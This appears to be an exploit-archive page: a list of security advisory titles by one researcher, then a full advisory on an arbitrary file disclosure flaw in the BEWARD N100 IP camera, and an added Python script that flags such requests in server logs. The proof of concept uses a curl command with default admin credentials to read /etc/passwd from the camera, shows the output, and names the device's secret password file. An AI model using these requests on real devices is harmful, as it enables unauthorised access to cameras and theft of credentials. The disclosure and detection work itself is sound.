2017-12-27 "Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure" webapps hardware LiquidWorm
2017-12-27 "Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2017-12-27 "Easy!Appointments 1.2.1 - Cross-Site Scripting" webapps php LiquidWorm
2017-12-27 "Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure" webapps php LiquidWorm
2017-02-11 "SonicDICOM PACS 2.3.2 - Privilege Escalation" webapps windows LiquidWorm
2017-02-11 "SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)" webapps windows LiquidWorm
2017-02-11 "SonicDICOM PACS 2.3.2 - Cross-Site Scripting" webapps windows LiquidWorm
2017-01-29 "TrueConf Server 4.3.7 - Multiple Vulnerabilities" webapps php LiquidWorm
2016-12-29 "Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps hardware LiquidWorm
2016-12-29 "Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection" webapps hardware LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Remote Command Execution" webapps hardware LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Authentication Bypass" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference" webapps php LiquidWorm
2016-10-28 "InfraPower PPS-02-S Q213V1 - Local File Disclosure" webapps php LiquidWorm
2018-01-23 "NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download" webapps multiple LiquidWorm
2018-09-06 "NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)" webapps xml LiquidWorm
2016-08-31 "ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Directory Traversal" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution" webapps jsp LiquidWorm
2016-08-22 "Sakai 10.7 - Multiple Vulnerabilities" webapps java LiquidWorm
2016-08-10 "EyeLock nano NXT 3.5 - Remote Code Execution" webapps php LiquidWorm
2016-08-10 "EyeLock nano NXT 3.5 - Local File Disclosure" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)" webapps cgi LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Local File Disclosure" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2016-08-06 "NUUO NVRmini 2 3.0.8 - Remote Code Execution" webapps php LiquidWorm
2016-07-26 "Iris ID IrisAccess ICU 7000-2 - Remote Command Execution" webapps cgi LiquidWorm
2016-07-26 "Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities" webapps cgi LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)" webapps multiple LiquidWorm
2016-07-20 "Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation" webapps multiple LiquidWorm
2016-07-08 "CyberPower Systems PowerPanel 3.1.2 - XML External Entity Out-Of-Band Data Retrieval" webapps xml LiquidWorm
2016-07-04 "XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery" webapps jsp LiquidWorm
2016-06-27 "Option CloudGate CG0192-11897 - Multiple Vulnerabilities" webapps hardware LiquidWorm
2016-06-15 "Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities" webapps hardware LiquidWorm
2016-05-31 "Flatpress 1.0.3 - Cross-Site Request Forgery / Arbitrary File Upload" webapps php LiquidWorm
2016-04-25 "NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps ruby LiquidWorm
2016-06-16 "Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal" webapps windows LiquidWorm
2016-04-11 "Hikvision Digital Video Recorder - Cross-Site Request Forgery" webapps hardware LiquidWorm
2016-04-06 "Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities" webapps jsp LiquidWorm
2016-03-31 "MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2016-02-26 "Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities" webapps ashx LiquidWorm
2016-02-01 "Hippo CMS 10.1 - Multiple Vulnerabilities" webapps java LiquidWorm
2015-12-08 "dotCMS 3.2.4 - Multiple Vulnerabilities" webapps php LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - Local File Disclosure" webapps xml LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities" webapps xml LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - Expression Language Injection" webapps xml LiquidWorm
2015-12-08 "OpenMRS 2.3 (1.11.4) - XML External Entity Processing" webapps xml LiquidWorm
2015-11-12 "R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities" webapps php LiquidWorm
2015-11-02 "actiTIME 2015.2 - Multiple Vulnerabilities" webapps windows LiquidWorm
2015-10-19 "RealtyScript 4.0.2 - Multiple Blind SQL Injections" webapps php LiquidWorm
2015-10-19 "RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-10-11 "Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution" webapps php LiquidWorm
2015-10-08 "Kallithea 0.2.9 - 'came_from' HTTP Response Splitting" webapps multiple LiquidWorm
2015-09-28 "Centreon 2.6.1 - Multiple Vulnerabilities" webapps php LiquidWorm
2015-09-28 "Mango Automation 2.6.0 - Multiple Vulnerabilities" webapps jsp LiquidWorm
2015-08-19 "up.time 7.5.0 - Upload and Execute" webapps php LiquidWorm
2015-08-19 "up.time 7.5.0 - Arbitrary File Disclose and Delete" webapps php LiquidWorm
2015-08-19 "up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2015-08-19 "up.time 7.5.0 - Superadmin Privilege Escalation" webapps php LiquidWorm
2015-08-07 "Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution" webapps php LiquidWorm
2015-08-07 "Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2012-08-23 "KindEditor - 'name' Cross-Site Scripting" webapps php LiquidWorm
2012-08-23 "Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities" webapps php LiquidWorm
2012-08-23 "SiNG cms - 'Password.php' Cross-Site Scripting" webapps php LiquidWorm
2015-07-13 "ArticleFR 3.0.6 - Multiple Vulnerabilities" webapps php LiquidWorm
2012-05-16 "backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting" webapps php LiquidWorm
2012-04-11 "BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities" webapps php LiquidWorm
2015-04-14 "WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution" webapps php LiquidWorm
2015-04-14 "WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-04-14 "WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Deletion" webapps php LiquidWorm
2015-04-08 "Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities" webapps php LiquidWorm
2015-04-08 "Balero CMS 0.7.2 - Multiple Blind SQL Injections" webapps php LiquidWorm
2012-02-07 "ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Cross-Site Scripting" webapps java LiquidWorm
2012-02-07 "ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Cross-Site Scripting" webapps java LiquidWorm
2015-03-17 "Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/admin_pages.php?Filename' Traversal Arbitrary File Access" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/admin_blocks.php?Filename' Traversal Arbitrary File Access" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2011-11-28 "Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-03-10 "GeniXCMS 0.0.1 - Multiple Vulnerabilities" webapps php LiquidWorm
2011-10-26 "vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - 'thumb.php' Local File Inclusion" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - Multiple SQL Injections" webapps php LiquidWorm
2015-02-09 "u5CMS 3.9.3 - 'deletefile.php' Arbitrary File Deletion" webapps php LiquidWorm
2011-06-07 "The Pacer Edition CMS 2.1 - 'email' Cross-Site Scripting" webapps php LiquidWorm
2011-05-31 "Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Cross-Site Scripting" webapps asp LiquidWorm
2015-01-13 "Gecko CMS 2.3 - Multiple Vulnerabilities" webapps php LiquidWorm
2015-01-06 "AdaptCMS 3.0.3 - Multiple Vulnerabilities" webapps php LiquidWorm
2014-12-15 "Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass" webapps windows LiquidWorm
2014-12-08 "IceHrm 7.1 - Multiple Vulnerabilities" webapps php LiquidWorm
2011-04-03 "DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities" webapps php LiquidWorm
2011-02-15 "MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2011-02-12 "TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting" webapps php LiquidWorm
2011-02-12 "TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2011-02-12 "TaskFreak! 0.6.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-11-22 "NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access" webapps hardware LiquidWorm
2014-11-19 "Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2014-10-27 "CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities" webapps hardware LiquidWorm
2014-10-14 "Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-10-14 "Croogo 2.0.0 - Arbitrary PHP Code Execution" webapps php LiquidWorm
2010-10-15 "eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-08-03 "RaidenTunes - 'music_out.php' Cross-Site Scripting" webapps php LiquidWorm
2014-07-30 "SkaDate Lite 2.0 - Remote Code Execution" webapps php LiquidWorm
2014-07-30 "SkaDate Lite 2.0 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities" webapps php LiquidWorm
2014-07-28 "Oxwall 1.7.0 - Multiple Cross-Site Request Forgery / HTML Injection Vulnerabilities" webapps php LiquidWorm
2014-07-17 "Omeka 2.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting" webapps php LiquidWorm
2014-06-25 "Lunar CMS 3.3 - Remote Command Execution" webapps php LiquidWorm
2014-06-21 "Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting" webapps php LiquidWorm
2014-06-10 "ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection" webapps php LiquidWorm
2014-04-29 "NULL NUKE CMS 2.2 - Multiple Vulnerabilities" webapps php LiquidWorm
2014-03-25 "qEngine CMS 6.0.0 - Multiple Vulnerabilities" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - 'qvc_init()' Cookie Poisoning CAPTCHA Bypass" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - Database Backup Disclosure" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - 'task.php' Local File Inclusion" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - Remote Code Execution" webapps php LiquidWorm
2014-03-25 "Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure" webapps php LiquidWorm
2014-03-25 "Cart Engine 3.0.0 - Database Backup Disclosure" webapps php LiquidWorm
2014-03-25 "Cart Engine 3.0.0 - 'task.php' Local File Inclusion" webapps php LiquidWorm
2014-03-25 "Cart Engine 3.0.0 - Remote Code Execution" webapps php LiquidWorm
2014-03-03 "couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections" webapps php LiquidWorm
2014-02-20 "Stark CRM 1.0 - Multiple Vulnerabilities" webapps php LiquidWorm
2013-12-06 "BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting" webapps php LiquidWorm


BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure

Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: The camera suffers from an authenticated file disclosure vulnerability.
Input passed via the 'READ.filePath' parameter in the fileread script is not
properly verified before being used to read files. This can be exploited to
disclose the contents of arbitrary files via an absolute path or via the
SendCGICMD API.

Tested on: Boa/0.94.14rc21
           Faraday ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5511
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php


26.01.2019


--
From the term:
--
root@ground:~# curl -H "Authorization: Basic YWRtaW46YWRtaW4=" http://TARGET/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

--
From the web console:
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/passwd")
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/issue")
--
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ARM Linux 2.6

Copyright (C) 2005 Faraday Corp. <www.faraday.com.tw>
Released under GNU GPL

--
wr: /usr/share/www/html
sp: /var/www/secret.passwd
bc: /etc/boa.conf
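
--
Added example (not part of the original advisory): a log check for the fileread requests described in the Desc section, which reports every READ.filePath that normalises to a location outside an allow-list. It assumes the web server or a fronting proxy logs in Common Log Format; ALLOWED_DIRS is a hypothetical placeholder, and the sample log lines are constructed.
--

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: directories fileread may legitimately serve on this deployment.
# The advisory defines none; "/var/log" is a hypothetical placeholder.
ALLOWED_DIRS = ("/var/log",)

# Assumption: Common Log Format, i.e. client ... "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def requested_path(target):
    """Return the normalised READ.filePath of a fileread request, else None."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith("/fileread"):
        return None
    # parse_qs percent-decodes once; keys are compared case-insensitively.
    query = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    values = query.get("read.filepath")
    if not values:
        return None
    norm = posixpath.normpath(values[0])  # collapse "." and ".." segments
    # normpath keeps a leading "//", so rebuild the single leading slash.
    return "/" + norm.lstrip("/") if norm.startswith("/") else norm

def is_allowed(path):
    """True only for an allowed directory itself or a path beneath it."""
    return any(path == d or path.startswith(d + "/") for d in ALLOWED_DIRS)

def suspicious_requests(log_lines):
    """Return (client, path, status) for fileread reads outside ALLOWED_DIRS."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        path = requested_path(target)
        if path is not None and not is_allowed(path):
            hits.append((client, path, int(status)))
    return hits

# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = [
    '192.0.2.10 - admin [26/Jan/2019:10:00:01 +0000] "GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1" 200 412',
    '192.0.2.10 - admin [26/Jan/2019:10:00:05 +0000] "GET /cgi-bin/operator/fileread?READ.filePath=/var/log/../../etc/issue HTTP/1.1" 200 120',
    '192.0.2.22 - admin [26/Jan/2019:10:01:00 +0000] "GET /cgi-bin/operator/fileread?READ.filePath=/var/log/messages HTTP/1.1" 200 2048',
    '192.0.2.22 - admin [26/Jan/2019:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 900',
]
```

A 200 status in a returned tuple means the read succeeded. The second sample line shows why the path has to be normalised before the prefix comparison.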